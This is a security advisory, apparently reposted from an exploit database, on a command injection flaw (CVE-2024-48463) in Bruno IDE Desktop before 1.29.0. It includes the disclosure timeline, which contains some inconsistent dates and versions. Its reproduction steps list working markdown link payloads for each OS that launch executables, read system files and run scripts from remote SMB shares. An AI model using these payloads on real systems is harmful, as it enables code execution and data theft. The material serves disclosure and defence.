Bruno IDE Desktop Command Injection Vulnerability

16 Jan 2025 00:00:00 · Reported by Rodolfo Tavares · Type: zdt · Source: 0day.today · 158 Views

Bruno IDE Desktop prior to 1.29.0 has a command injection vulnerability allowing remote code execution.

Related

Reporter               Title                                  Published          Family
Circl                  CVE-2024-48463                         4 Nov 2024 22:48   circl
CNNVD                  Bruno Security Vulnerability           4 Nov 2024 00:00   cnnvd
CVE                    CVE-2024-48463                         4 Nov 2024 00:00   cve
Cvelist                CVE-2024-48463                         4 Nov 2024 00:00   cvelist
NVD                    CVE-2024-48463                         4 Nov 2024 21:15   nvd
Packet Storm           Bruno IDE Desktop Command Injection    16 Jan 2025 00:00  packetstorm
Positive Technologies  PT-2024-33122 · Electron +1            4 Nov 2024 00:00   ptsecurity
RedhatCVE              CVE-2024-48463                         23 May 2025 06:22  redhatcve
Vulnrichment           CVE-2024-48463                         4 Nov 2024 00:00   vulnrichment
Bruno IDE Desktop prior to 1.29.0

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents ]==================================================

Overview
Detailed Description
Timeline of Disclosure
Thanks & Acknowledgements
References

=====[ Vulnerability Information ]==========================================

Class: Improper Neutralization of Input During Web Page Generation
('Command Injection') [CWE-78]
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - 9.8

=====[ Overview ]===========================================================

System Affected: Bruno IDE Desktop
Software Version: All versions prior to 1.29.0
Impacts:
Vulnerability: A command injection vulnerability in the function
shell.openExternal of Bruno IDE Desktop prior to version 1.29.0 allows
attackers to execute arbitrary commands by supplying a crafted URL, leading
to potential remote code execution.

=====[ Detailed Description ]===============================================

Command Injection [PoC - Reproduction Steps]:

1. Launch Bruno IDE Desktop on any supported operating system.
2. Create a Collection and navigate to the Docs tab.
3. Insert the following markdown payloads depending on the target OS:

Linux:

[passwd](/etc/passwd)

[smb](smb://localhost/public/x.desktop) - Malicious .desktop file

[sftp](sftp://user@localhost/home/user/s.desktop) - Malicious .desktop file

POC Video: https://www.youtube.com/watch?v=SPCGVLEfVgw

Windows:

[Calc](C:/Windows/system32/calc.exe)

If Java is installed, directly execute a malicious .jar file:

[exploit](http://localhost/pwn.jar)

[exploit](C:/Users/user/Downloads/pwn.jar)

POC Video: https://www.youtube.com/watch?v=KVwKQkXA-vI

macOS:

[calc](/System/Applications/Calculator.app) - Opens Calculator on macOS.

[calcFile](System/Applications/Calculator.app) - Another method to trigger
Calculator.

[exploit1](smb://10.211.55.6/public/hello.scptd) - Connects to a remote SMB
share and executes a script.

[exploit2](/Volumes/hello.scptd/Contents/Resources/Scripts/main.scpt) -
Executes a script from a mounted volume.

[file](///etc/hosts) - Reads the system’s /etc/hosts file.

[facetime1](facetime:+123456789) - Attempts to launch FaceTime with a
specific phone number.

[facetime2](facetime:[email protected]) - Triggers FaceTime using an
email address.

[tel](tel:+123456789) - Initiates a phone call via the tel: protocol.

[mail](x-apple-reminder://) - Opens the Apple Reminders app via a custom
protocol.

[calendar](calendar://) - Attempts to open a calendar application.

POC Video: https://www.youtube.com/watch?v=S0W93tbKaFY

4. Upon execution, the crafted URL results in arbitrary command execution
in the victim's environment.

=====[ Timeline of Disclosure ]=============================================

14/Sep/2024 - Responsible disclosure was initiated with the vendor.
16/Sep/2024 - Vendor acknowledged the vulnerability.
20/Nov/2024 - The vendor released a patch (version 1.29.1) addressing the
issue.
24/Oct/2024 - CVE-2024-48463 was assigned and reserved.

=====[ Thanks & Acknowledgements ]==========================================

Tempest Security Intelligence [1]
Rodolfo Tavares - Vulnerability Discoverer
Filipe Xavier - Special Thanks
Henrique Arcoverde - Special Thanks

=====[ References ]=========================================================

[1] https://www.tempest.com.br
[2] https://cwe.mitre.org/data/definitions/78.html
[3] https://gist.github.com/opcod3r/ab69f36d52367df7ffac32a597dff31c
[4] https://nvd.nist.gov/vuln/detail/CVE-2024-48463

Vulners scores (16 Jan 2025 00:00, current): Vulners AI Score 7.1 (High risk) · CVSS 3.1 6.5 · EPSS 0.00204 · 158 Views